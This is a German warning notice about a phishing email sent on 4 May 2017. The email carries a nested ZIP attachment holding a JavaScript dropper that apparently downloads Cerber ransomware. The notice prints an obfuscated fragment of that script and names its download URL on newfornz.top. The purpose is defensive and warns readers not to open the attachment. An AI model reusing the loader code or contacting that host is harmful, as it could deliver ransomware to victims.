51075 (Empfängername) von [email protected]
Am Donnerstag, den 04. Mai 2017 wurde durch unbekannte Dritte die folgende E-Mail versendet. Achtung: Die E-Mail lädt vermutlich den Verschlüsselungs- und Erpressungstrojaner „Cerber“ (Ransomware) nach. Öffnen Sie daher nicht die Anlage!
Betreff: 51075 (Empfängername)
Absender: [email protected]
Anlage: 66277327894.zip
Als Anlage ist ein ZIP-Archiv beigefügt, welches z. B. „66277327894.zip“ lautet. Darin ist nochmals eine .zip-Datei wie z. B. „28096.zip“ enthalten. In diesem zweiten ZIP-Archiv ist dann ein JavaScript „28096.js“ enthalten:
var UMGOfNrnAKCEpuLdRjs = ‚vjGIkfsTqOEajG’+
‚IkfsTqOErjGIkfsTqOE jG’+
‚Ikfs’+
‚TqOEIgRU’+
‚xyMjGIkfsTqOEAjGIkfsTqOEwjGIkfsTqOEejGIkfsTqOEtjGIkfsTq’+
‚OEdjGIkfsTqOEnsOjGIkfsTqO’+
‚E’+
‚fajGIkfsTqOEKDjGIkfsTqOE = jGIkfs’+
‚TqOEnejGIkfsTqOEwjGIkfsTqOE AjGIkfsT’+
‚qOEcjGIkfsTqOEtijGIkfs’+
‚TqOEvjGIkfsTqOEeXjGIkfsTqOEOjGIkfsTqOEbjjGIkfsTqOEecjGIkfsTq’+
‚OEt(„shjG’+
‚IkfsTqOEejGIkfsTqOEljGIkfs’+
‚TqOE’+
‚l.j’+
‚GI’+
‚kfsTqOEapPljGIkfsTqOEI’+
‚jGIkfsTqOEcjGIkfsTqOEajG’+
‚IkfsTqOEtIOjGIkfsTqOEN“jGIkfsTqOE)jGIkfsTqOE;jGIkfsTqOE v’+
‚ajGIkfsTqOEr uIjGIkfsTqOEwylMCj’+
‚GIkfsTqOEj’+
‚jGIkfsTqOEejGIkfsTqOErjGIkf’+
’sTqOEcjGIkfsTqOEhjGIkf’+
’sTqOETjGIkfsTqOEnmjGIkfsTq’+
‚OEFj’+
‚GIkfsTqOEGjG’+
‚IkfsTqOEAY jGIkfsTqOE= newjGIkfs’+
Da soll etwas verborgen werden! Führen Sie das Script daher nicht aus!
Das Script würde von der Domain newfornz.top die Datei admin.php?f=404 öffnen. Vermutlich verbirgt sich dahinter die Cerber Ransomware (Verschlüsselungs- und Erpressungstrojaner).
Beim Test hat der Server eine Fehlermeldung zurückgeliefert.
GET /admin.php?f=404 HTTP/1.1
HTTP/1.1 502 Bad Gateway (text/html)
Das bedeutet aber nicht, dass dies so bleibt oder bei Ihrer E-Mail nicht eine andere Adresse aufgerufen werden soll. Führen Sie das JavaScript daher lieber nicht aus!